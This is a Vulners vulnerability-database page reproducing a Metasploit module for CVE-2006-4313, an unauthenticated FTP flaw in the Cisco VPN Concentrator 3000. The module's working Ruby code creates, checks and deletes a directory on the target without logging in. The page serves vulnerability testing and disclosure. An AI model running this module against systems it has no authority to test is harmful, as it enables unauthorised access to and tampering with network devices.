Lucene search
K

Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access

🗓️ 22 Jun 2020 10:11:11Reported by aushack <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 66 Views

Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access. Logic vulnerability allows unauthorized FTP commands execution leading to memory leaks and arbitrary directory creation, verification, and deletion

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2006-4313
16 Jul 202015:38
circl
Cisco
Cisco VPN 3000 Concentrator FTP Management Vulnerabilities
23 Aug 200616:00
cisco
CVE
CVE-2006-4313
23 Aug 200622:00
cve
Cvelist
CVE-2006-4313
23 Aug 200622:00
cvelist
NVD
CVE-2006-4313
23 Aug 200622:04
nvd
Packet Storm
Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access
31 Aug 202400:00
packetstorm
seebug.org
Cisco VPN 3000 Concentrator FTP任意文件访问漏洞
11 Dec 200600:00
seebug
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Deprecated
  moved_from 'auxiliary/admin/cisco/vpn_3000_ftp_bypass'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access',
        'Description' => %q{
          This module tests for a logic vulnerability in the Cisco VPN Concentrator
          3000 series. It is possible to execute some FTP statements without authentication
          (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs
          when working with CWD commands. This module simply creates an arbitrary directory,
          verifies that the directory has been created, then deletes it and verifies deletion
          to confirm the bug.
        },
        'Author'	=> [ 'aushack' ],
        'License'	=> MSF_LICENSE,
        'References' => [
          [ 'BID', '19680' ],
          [ 'CVE', '2006-4313' ],
          [ 'OSVDB', '28139' ],
          [ 'OSVDB', '28138' ]
        ],
        'DisclosureDate' => '2006-08-23',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(21),
      ]
    )
  end

  def run
    connect
    res = sock.get_once
    if res && res =~ /220 Session will be terminated after/
      print_status('Target appears to be a Cisco VPN Concentrator 3000 series.')

      test = Rex::Text.rand_text_alphanumeric(8)

      print_status("Attempting to create directory: MKD #{test}")
      sock.put("MKD #{test}\r\n")
      res = sock.get_once(-1, 5)

      if (res =~ /257 MKD command successful\./)
        print_status("\tDirectory #{test} reportedly created. Verifying with SIZE #{test}")
        sock.put("SIZE #{test}\r\n")
        res = sock.get_once(-1, 5)
        if (res =~ /550 Not a regular file/)
          print_status("\tServer reports \"not a regular file\". Directory verified.")
          print_status("\tAttempting to delete directory: RMD #{test}")
          sock.put("RMD #{test}\r\n")
          res = sock.get_once(-1, 5)
          if (res =~ /250 RMD command successful\./)
            print_status("\tDirectory #{test} reportedly deleted. Verifying with SIZE #{test}")
            sock.put("SIZE #{test}\r\n")
            sock.get_once(-1, 5)
            print_status("\tDirectory #{test} no longer exists!")
            print_status('Target is confirmed as vulnerable!')
          end
        end
      end
    else
      print_status('Target is either not Cisco or the target has been patched.')
    end
    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jul 2024 15:47Current
7.9High risk
Vulners AI Score7.9
CVSS 25
EPSS0.12101
66